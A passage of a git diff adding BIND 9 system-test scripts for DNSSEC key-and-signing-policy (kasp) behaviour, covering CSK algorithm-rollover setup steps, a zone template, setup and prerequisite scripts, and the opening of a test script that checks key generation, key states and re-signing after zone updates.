"${CSK1}.state" +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone 5 "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -z -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 3: +# The zone signatures are also OMNIPRESENT. +setup step3.csk-algorithm-roll.kasp +# The time passed since the new algorithm keys have been introduced is 9 hours. +TactN="now-9h" +TretN="now-6h" +TpubN1="now-9h" +TactN1="now-6h" +csktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN}" +newtimes="-P ${TpubN1} -A ${TpubN1}" +CSK1=$($KEYGEN -k csk-algoroll -l policies/csk1.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-algoroll -l policies/csk2.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -z $O $TactN -d $O $TactN "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TactN1 -r $O $TactN1 -z $R $TpubN1 -d $H $TpubN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Fake lifetime of old algorithm keys. +echo "Lifetime: 0" >> "${CSK1}.state" +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone 5 "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -z -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 4: +# The DS is swapped and can become OMNIPRESENT. +setup step4.csk-algorithm-roll.kasp +# The time passed since the DS has been swapped is 29 hours. +TactN="now-38h" +TretN="now-35h" +TpubN1="now-38h" +TactN1="now-35h" +TsubN1="now-29h" +csktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN}" +newtimes="-P ${TpubN1} -A ${TpubN1}" +CSK1=$($KEYGEN -k csk-algoroll -l policies/csk1.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-algoroll -l policies/csk2.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -z $O $TactN -d $U $TactN1 -D ds $TactN1 "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TactN1 -r $O $TactN1 -z $O $TsubN1 -d $R $TsubN1 -P ds $TsubN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Fake lifetime of old algorithm keys. +echo "Lifetime: 0" >> "${CSK1}.state" +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone 5 "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -z -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 5: +# The DNSKEY is removed long enough to be HIDDEN. +setup step5.csk-algorithm-roll.kasp +# The time passed since the DNSKEY has been removed is 2 hours. +TactN="now-40h" +TretN="now-37h" +TremN="now-2h" +TpubN1="now-40h" +TactN1="now-37h" +TsubN1="now-31h" +csktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN}" +newtimes="-P ${TpubN1} -A ${TpubN1}" +CSK1=$($KEYGEN -k csk-algoroll -l policies/csk1.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-algoroll -l policies/csk2.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $U $TremN -r $U $TremN -z $U $TremN -d $H $TremN "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TactN1 -r $O $TactN1 -z $O $TsubN1 -d $O $TremN "$CSK2" > settime.out.$zone.2 2>&1 +# Fake lifetime of old algorithm keys. +echo "Lifetime: 0" >> "${CSK1}.state" +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone 5 "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -z -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 6: +# The RRSIGs have been removed long enough to be HIDDEN. +setup step6.csk-algorithm-roll.kasp +# Additional time passed: 7h. +TactN="now-47h" +TretN="now-44h" +TdeaN="now-9h" +TremN="now-7h" +TpubN1="now-47h" +TactN1="now-44h" +TsubN1="now-38h" +csktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN}" +newtimes="-P ${TpubN1} -A ${TpubN1}" +CSK1=$($KEYGEN -k csk-algoroll -l policies/csk1.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-algoroll -l policies/csk2.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $H $TremN -r $U $TdeaN -z $U $TdeaN -d $H $TactN1 "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TactN1 -r $O $TactN1 -z $O $TsubN1 -d $O $TactN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Fake lifetime of old algorithm keys. +echo "Lifetime: 0" >> "${CSK1}.state" +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone 5 "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -z -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# +# Reload testing +# +echo "example" >> zones +cp example.db.in example.db + +setup "dynamic2inline.kasp" +cp template.db.in $zonefile diff --git a/bin/tests/system/kasp/ns6/template.db.in b/bin/tests/system/kasp/ns6/template.db.in new file mode 100644 index 0000000..f1d8b94 --- /dev/null +++ b/bin/tests/system/kasp/ns6/template.db.in @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns6 +ns6 A 10.53.0.6 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 + diff --git a/bin/tests/system/kasp/prereq.sh b/bin/tests/system/kasp/prereq.sh new file mode 100644 index 0000000..9c5d879 --- /dev/null +++ b/bin/tests/system/kasp/prereq.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if ! test -n "$PYTHON"; then + echo_i "This test requires Python." + exit 1 +fi +exit 0 diff --git a/bin/tests/system/kasp/setup.sh b/bin/tests/system/kasp/setup.sh new file mode 100644 index 0000000..d3f4329 --- /dev/null +++ b/bin/tests/system/kasp/setup.sh @@ -0,0 +1,80 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +$SHELL clean.sh + +mkdir keys + +copy_setports ns2/named.conf.in ns2/named.conf +if ! $SHELL ../testcrypto.sh -q RSASHA1 +then + copy_setports ns3/named-fips.conf.in ns3/named.conf +else + copy_setports ns3/named-fips.conf.in ns3/named-fips.conf + copy_setports ns3/named.conf.in ns3/named.conf +fi +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf +copy_setports ns6/named.conf.in ns6/named.conf + +if $SHELL ../testcrypto.sh ed25519; then + echo "yes" > ed25519-supported.file +fi + +if $SHELL ../testcrypto.sh ed448; then + echo "yes" > ed448-supported.file +fi + +copy_setports ns3/policies/autosign.conf.in ns3/policies/autosign.conf +copy_setports ns3/policies/kasp-fips.conf.in ns3/policies/kasp-fips.conf +copy_setports ns3/policies/kasp.conf.in ns3/policies/kasp.conf +if ! $SHELL ../testcrypto.sh -q RSASHA1 +then + cp ns3/policies/kasp-fips.conf ns3/policies/kasp.conf +fi + +copy_setports ns6/policies/csk1.conf.in ns6/policies/csk1.conf +copy_setports ns6/policies/csk2.conf.in ns6/policies/csk2.conf +copy_setports ns6/policies/kasp-fips.conf.in ns6/policies/kasp-fips.conf +copy_setports ns6/policies/kasp.conf.in ns6/policies/kasp.conf +if ! $SHELL ../testcrypto.sh -q RSASHA1 +then + cp ns6/policies/kasp-fips.conf ns6/policies/kasp.conf +fi + +# Setup zones +( + cd ns2 + $SHELL setup.sh +) +( + cd ns3 + $SHELL setup.sh +) +( + cd ns4 + $SHELL setup.sh +) +( + cd ns5 + $SHELL setup.sh +) +( + cd ns6 + $SHELL setup.sh +) diff --git a/bin/tests/system/kasp/tests.sh b/bin/tests/system/kasp/tests.sh new file mode 100644 index 0000000..4d3bda7 --- /dev/null +++ b/bin/tests/system/kasp/tests.sh @@ -0,0 +1,4882 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +# shellcheck source=kasp.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" +. "$SYSTEMTESTTOP/kasp.sh" + +start_time="$(TZ=UTC date +%s)" +status=0 +n=0 + +############################################################################### +# Utilities # +############################################################################### + +# Call dig with default options. +dig_with_opts() { + + if [ -n "$TSIG" ]; then + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" -y "$TSIG" "$@" + else + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" + fi +} + +# RNDC. +rndccmd() { + "$RNDC" -c "$SYSTEMTESTTOP/common/rndc.conf" -p "$CONTROLPORT" -s "$@" +} + +# Log error and increment failure rate. +log_error() { + echo_i "error: $1" + ret=$((ret+1)) +} + +# Default next key event threshold. May be extended by wait periods. +next_key_event_threshold=100 + +############################################################################### +# Tests # +############################################################################### + +# +# dnssec-keygen +# +set_zone "kasp" +set_policy "kasp" "4" "200" +set_server "keys" "10.53.0.1" + +n=$((n+1)) +echo_i "check that 'dnssec-keygen -k' (configured policy) creates valid files ($n)" +ret=0 +$KEYGEN -K keys -k "$POLICY" -l kasp.conf "$ZONE" > "keygen.out.$POLICY.test$n" 2>/dev/null || ret=1 +lines=$(wc -l < "keygen.out.$POLICY.test$n") +test "$lines" -eq $NUM_KEYS || log_error "wrong number of keys created for policy kasp: $lines" +# Temporarily don't log errors because we are searching multiple files. +disable_logerror + +# Key properties. +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "31536000" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" + +set_keyrole "KEY2" "ksk" +set_keylifetime "KEY2" "31536000" +set_keyalgorithm "KEY2" "8" "RSASHA256" "2048" +set_keysigning "KEY2" "yes" +set_zonesigning "KEY2" "no" + +set_keyrole "KEY3" "zsk" +set_keylifetime "KEY3" "2592000" +set_keyalgorithm "KEY3" "8" "RSASHA256" "2048" +set_keysigning "KEY3" "no" +set_zonesigning "KEY3" "yes" + +set_keyrole "KEY4" "zsk" +set_keylifetime "KEY4" "16070400" +set_keyalgorithm "KEY4" "8" "RSASHA256" "3072" +set_keysigning "KEY4" "no" +set_zonesigning "KEY4" "yes" + +lines=$(get_keyids "$DIR" "$ZONE" | wc -l) +test "$lines" -eq $NUM_KEYS || log_error "bad number of key ids" + +ids=$(get_keyids "$DIR" "$ZONE") +for id in $ids; do + # There are four key files with the same algorithm. + # Check them until a match is found. + ret=0 && check_key "KEY1" "$id" + test "$ret" -eq 0 && continue + + ret=0 && check_key "KEY2" "$id" + test "$ret" -eq 0 && continue + + ret=0 && check_key "KEY3" "$id" + test "$ret" -eq 0 && continue + + ret=0 && check_key "KEY4" "$id" + + # If ret is still non-zero, non of the files matched. + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +done +# Turn error logs on again. +enable_logerror + +n=$((n+1)) +echo_i "check that 'dnssec-keygen -k' (default policy) creates valid files ($n)" +ret=0 +set_zone "kasp" +set_policy "default" "1" "3600" +set_server "." "10.53.0.1" +# Key properties. +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" + +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +$KEYGEN -G -k "$POLICY" "$ZONE" > "keygen.out.$POLICY.test$n" 2>/dev/null || ret=1 +lines=$(wc -l < "keygen.out.$POLICY.test$n") +test "$lines" -eq $NUM_KEYS || log_error "wrong number of keys created for policy default: $lines" +ids=$(get_keyids "$DIR" "$ZONE") +for id in $ids; do + check_key "KEY1" "$id" + test "$ret" -eq 0 && key_save KEY1 + check_keytimes +done +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# dnssec-settime +# + +# These test builds upon the latest created key with dnssec-keygen and uses the +# environment variables BASE_FILE, KEY_FILE, PRIVATE_FILE and STATE_FILE. +CMP_FILE="${BASE_FILE}.cmp" +n=$((n+1)) +echo_i "check that 'dnssec-settime' by default does not edit key state file ($n)" +ret=0 +cp "$STATE_FILE" "$CMP_FILE" +$SETTIME -P +3600 "$BASE_FILE" > /dev/null || log_error "settime failed" +grep "; Publish: " "$KEY_FILE" > /dev/null || log_error "mismatch published in $KEY_FILE" +grep "Publish: " "$PRIVATE_FILE" > /dev/null || log_error "mismatch published in $PRIVATE_FILE" +$DIFF "$CMP_FILE" "$STATE_FILE" || log_error "unexpected file change in $STATE_FILE" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "check that 'dnssec-settime -s' also sets publish time metadata and states in key state file ($n)" +ret=0 +cp "$STATE_FILE" "$CMP_FILE" +now=$(date +%Y%m%d%H%M%S) +$SETTIME -s -P "$now" -g "omnipresent" -k "rumoured" "$now" -z "omnipresent" "$now" -r "rumoured" "$now" -d "hidden" "$now" "$BASE_FILE" > /dev/null || log_error "settime failed" +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "hidden" +check_key "KEY1" "$id" +test "$ret" -eq 0 && key_save KEY1 +set_keytime "KEY1" "PUBLISHED" "${now}" +check_keytimes +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "check that 'dnssec-settime -s' also unsets publish time metadata and states in key state file ($n)" +ret=0 +cp "$STATE_FILE" "$CMP_FILE" +$SETTIME -s -P "none" -g "none" -k "none" "$now" -z "none" "$now" -r "none" "$now" -d "none" "$now" "$BASE_FILE" > /dev/null || log_error "settime failed" +set_keystate "KEY1" "GOAL" "none" +set_keystate "KEY1" "STATE_DNSKEY" "none" +set_keystate "KEY1" "STATE_KRRSIG" "none" +set_keystate "KEY1" "STATE_ZRRSIG" "none" +set_keystate "KEY1" "STATE_DS" "none" +check_key "KEY1" "$id" +test "$ret" -eq 0 && key_save KEY1 +set_keytime "KEY1" "PUBLISHED" "none" +check_keytimes +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "check that 'dnssec-settime -s' also sets active time metadata and states in key state file (uppercase) ($n)" +ret=0 +cp "$STATE_FILE" "$CMP_FILE" +now=$(date +%Y%m%d%H%M%S) +$SETTIME -s -A "$now" -g "HIDDEN" -k "UNRETENTIVE" "$now" -z "UNRETENTIVE" "$now" -r "OMNIPRESENT" "$now" -d "OMNIPRESENT" "$now" "$BASE_FILE" > /dev/null || log_error "settime failed" +set_keystate "KEY1" "GOAL" "hidden" +set_keystate "KEY1" "STATE_DNSKEY" "unretentive" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_ZRRSIG" "unretentive" +set_keystate "KEY1" "STATE_DS" "omnipresent" +check_key "KEY1" "$id" +test "$ret" -eq 0 && key_save KEY1 +set_keytime "KEY1" "ACTIVE" "${now}" +check_keytimes +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# named +# + +# The NSEC record at the apex of the zone and its RRSIG records are +# added as part of the last step in signing a zone. We wait for the +# NSEC records to appear before proceeding with a counter to prevent +# infinite loops if there is an error. +n=$((n+1)) +echo_i "waiting for kasp signing changes to take effect ($n)" + +_wait_for_done_apexnsec() { + while read -r zone + do + dig_with_opts "$zone" @10.53.0.3 nsec > "dig.out.ns3.test$n.$zone" || return 1 + grep "NS SOA" "dig.out.ns3.test$n.$zone" > /dev/null || return 1 + grep "$zone\..*IN.*RRSIG" "dig.out.ns3.test$n.$zone" > /dev/null || return 1 + done < ns3/zones + + while read -r zone + do + dig_with_opts "$zone" @10.53.0.6 nsec > "dig.out.ns6.test$n.$zone" || return 1 + grep "NS SOA" "dig.out.ns6.test$n.$zone" > /dev/null || return 1 + grep "$zone\..*IN.*RRSIG" "dig.out.ns6.test$n.$zone" > /dev/null || return 1 + done < ns6/zones + + return 0 +} +retry_quiet 30 _wait_for_done_apexnsec || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Test max-zone-ttl rejects zones with too high TTL. +n=$((n+1)) +echo_i "check that max-zone-ttl rejects zones with too high TTL ($n)" +ret=0 +set_zone "max-zone-ttl.kasp" +grep "loading from master file ${ZONE}.db failed: out of range" "ns3/named.run" > /dev/null || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Zone: default.kasp. +# +set_keytimes_csk_policy() { + # The first key is immediately published and activated. + created=$(key_get KEY1 CREATED) + set_keytime "KEY1" "PUBLISHED" "${created}" + set_keytime "KEY1" "ACTIVE" "${created}" + # The DS can be published if the DNSKEY and RRSIG records are + # OMNIPRESENT. This happens after max-zone-ttl (1d) plus + # publish-safety (1h) plus zone-propagation-delay (300s) = + # 86400 + 3600 + 300 = 90300. + set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" 90300 + # Key lifetime is unlimited, so not setting RETIRED and REMOVED. +} + +# Check the zone with default kasp policy has loaded and is signed. +set_zone "default.kasp" +set_policy "default" "1" "3600" +set_server "ns3" "10.53.0.3" +# Key properties. +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +# DNSKEY, RRSIG (ksk), RRSIG (zsk) are published. DS needs to wait. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Trigger a keymgr run. Make sure the key files are not touched if there are +# no modifications to the key metadata. +n=$((n+1)) +echo_i "make sure key files are untouched if metadata does not change ($n)" +ret=0 +basefile=$(key_get KEY1 BASEFILE) +privkey_stat=$(key_get KEY1 PRIVKEY_STAT) +pubkey_stat=$(key_get KEY1 PUBKEY_STAT) +state_stat=$(key_get KEY1 STATE_STAT) + +nextpart $DIR/named.run > /dev/null +rndccmd 10.53.0.3 loadkeys "$ZONE" > /dev/null || log_error "rndc loadkeys zone ${ZONE} failed" +wait_for_log 3 "keymgr: $ZONE done" $DIR/named.run +privkey_stat2=$(key_stat "${basefile}.private") +pubkey_stat2=$(key_stat "${basefile}.key") +state_stat2=$(key_stat "${basefile}.state") +test "$privkey_stat" = "$privkey_stat2" || log_error "wrong private key file stat (expected $privkey_stat got $privkey_stat2)" +test "$pubkey_stat" = "$pubkey_stat2" || log_error "wrong public key file stat (expected $pubkey_stat got $pubkey_stat2)" +test "$state_stat" = "$state_stat2" || log_error "wrong state file stat (expected $state_stat got $state_stat2)" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "again ($n)" +ret=0 + +nextpart $DIR/named.run > /dev/null +rndccmd 10.53.0.3 loadkeys "$ZONE" > /dev/null || log_error "rndc loadkeys zone ${ZONE} failed" +wait_for_log 3 "keymgr: $ZONE done" $DIR/named.run +privkey_stat2=$(key_stat "${basefile}.private") +pubkey_stat2=$(key_stat "${basefile}.key") +state_stat2=$(key_stat "${basefile}.state") +test "$privkey_stat" = "$privkey_stat2" || log_error "wrong private key file stat (expected $privkey_stat got $privkey_stat2)" +test "$pubkey_stat" = "$pubkey_stat2" || log_error "wrong public key file stat (expected $pubkey_stat got $pubkey_stat2)" +test "$state_stat" = "$state_stat2" || log_error "wrong state file stat (expected $state_stat got $state_stat2)" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Update zone. +n=$((n+1)) +echo_i "modify unsigned zone file and check that new record is signed for zone ${ZONE} ($n)" +ret=0 +cp "${DIR}/template2.db.in" "${DIR}/${ZONE}.db" +rndccmd 10.53.0.3 reload "$ZONE" > /dev/null || log_error "rndc reload zone ${ZONE} failed" + +update_is_signed() { + ip_a=$1 + ip_d=$2 + + if [ "$ip_a" != "-" ]; then + dig_with_opts "a.${ZONE}" "@${SERVER}" A > "dig.out.$DIR.test$n.a" || return 1 + grep "status: NOERROR" "dig.out.$DIR.test$n.a" > /dev/null || return 1 + grep "a.${ZONE}\..*${DEFAULT_TTL}.*IN.*A.*${ip_a}" "dig.out.$DIR.test$n.a" > /dev/null || return 1 + lines=$(get_keys_which_signed A "dig.out.$DIR.test$n.a" | wc -l) + test "$lines" -eq 1 || return 1 + get_keys_which_signed A "dig.out.$DIR.test$n.a" | grep "^${KEY_ID}$" > /dev/null || return 1 + fi + + if [ "$ip_d" != "-" ]; then + dig_with_opts "d.${ZONE}" "@${SERVER}" A > "dig.out.$DIR.test$n".d || return 1 + grep "status: NOERROR" "dig.out.$DIR.test$n".d > /dev/null || return 1 + grep "d.${ZONE}\..*${DEFAULT_TTL}.*IN.*A.*${ip_d}" "dig.out.$DIR.test$n".d > /dev/null || return 1 + lines=$(get_keys_which_signed A "dig.out.$DIR.test$n".d | wc -l) + test "$lines" -eq 1 || return 1 + get_keys_which_signed A "dig.out.$DIR.test$n".d | grep "^${KEY_ID}$" > /dev/null || return 1 + fi +} + +retry_quiet 10 update_is_signed "10.0.0.11" "10.0.0.44" || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Move the private key file, a rekey event should not introduce replacement +# keys. +ret=0 +echo_i "test that if private key files are inaccessible this doesn't trigger a rollover ($n)" +basefile=$(key_get KEY1 BASEFILE) +mv "${basefile}.private" "${basefile}.offline" +rndccmd 10.53.0.3 loadkeys "$ZONE" > /dev/null || log_error "rndc loadkeys zone ${ZONE} failed" +wait_for_log 3 "offline, policy default" $DIR/named.run || ret=1 +mv "${basefile}.offline" "${basefile}.private" +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Nothing has changed. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Zone: dynamic.kasp +# +set_zone "dynamic.kasp" +set_dynamic +set_policy "default" "1" "3600" +set_server "ns3" "10.53.0.3" +# Key properties, timings and states same as above. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Update zone with nsupdate. +n=$((n+1)) +echo_i "nsupdate zone and check that new record is signed for zone ${ZONE} ($n)" +ret=0 +( +echo zone ${ZONE} +echo server 10.53.0.3 "$PORT" +echo update del "a.${ZONE}" 300 A 10.0.0.1 +echo update add "a.${ZONE}" 300 A 10.0.0.101 +echo update add "d.${ZONE}" 300 A 10.0.0.4 +echo send +) | $NSUPDATE + +retry_quiet 10 update_is_signed "10.0.0.101" "10.0.0.4" || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Update zone with nsupdate (reverting the above change). +n=$((n+1)) +echo_i "nsupdate zone and check that new record is signed for zone ${ZONE} ($n)" +ret=0 +( +echo zone ${ZONE} +echo server 10.53.0.3 "$PORT" +echo update add "a.${ZONE}" 300 A 10.0.0.1 +echo update del "a.${ZONE}" 300 A 10.0.0.101 +echo update del "d.${ZONE}" 300 A 10.0.0.4 +echo send +) | $NSUPDATE + +retry_quiet 10 update_is_signed "10.0.0.1" "-" || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Update zone with freeze/thaw. +n=$((n+1)) +echo_i "modify zone file and check that new record is signed for zone ${ZONE} ($n)" +ret=0 +rndccmd 10.53.0.3 freeze "$ZONE" > /dev/null || log_error "rndc freeze zone ${ZONE} failed" +sleep 1 +echo "d.${ZONE}. 300 A 10.0.0.44" >> "${DIR}/${ZONE}.db" +rndccmd 10.53.0.3 thaw "$ZONE" > /dev/null || log_error "rndc thaw zone ${ZONE} failed" + +retry_quiet 10 update_is_signed "10.0.0.1" "10.0.0.44" || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Zone: dynamic-inline-signing.kasp +# +set_zone "dynamic-inline-signing.kasp" +set_dynamic +set_policy "default" "1" "3600" +set_server "ns3" "10.53.0.3" +# Key properties, timings and states same as above. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Update zone with freeze/thaw. +n=$((n+1)) +echo_i "modify unsigned zone file and check that new record is signed for zone ${ZONE} ($n)" +ret=0 +rndccmd 10.53.0.3 freeze "$ZONE" > /dev/null || log_error "rndc freeze zone ${ZONE} failed" +sleep 1 +cp "${DIR}/template2.db.in" "${DIR}/${ZONE}.db" +rndccmd 10.53.0.3 thaw "$ZONE" > /dev/null || log_error "rndc thaw zone ${ZONE} failed" + +retry_quiet 10 update_is_signed || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# Zone: inline-signing.kasp +# +set_zone "inline-signing.kasp" +set_policy "default" "1" "3600" +set_server "ns3" "10.53.0.3" +# Key properties, timings and states same as above. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +set_keytimes_csk_policy +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# +# Zone: checkds-ksk.kasp. +# +key_clear "KEY1" +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +set_zone "checkds-ksk.kasp" +set_policy "checkds-ksk" "2" "303" +set_server "ns3" "10.53.0.3" +# Key properties. +set_keyrole "KEY1" "ksk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "no" + +set_keyrole "KEY2" "zsk" +set_keylifetime "KEY2" "0" +set_keyalgorithm "KEY2" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY2" "no" +set_zonesigning "KEY2" "yes" +# DNSKEY, RRSIG (ksk), RRSIG (zsk) are published. DS needs to wait. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" + +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "rumoured" +set_keystate "KEY2" "STATE_ZRRSIG" "rumoured" + +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +basefile=$(key_get KEY1 BASEFILE) + +_wait_for_metadata() { + _expr=$1 + _file=$2 + grep "$_expr" $_file > /dev/null || return 1 + return 0 +} + +n=$((n+1)) +echo_i "checkds publish correctly sets DSPublish for zone $ZONE ($n)" +now=$(date +%Y%m%d%H%M%S) +rndc_checkds "$SERVER" "$DIR" "-" "$now" "published" "$ZONE" +retry_quiet 3 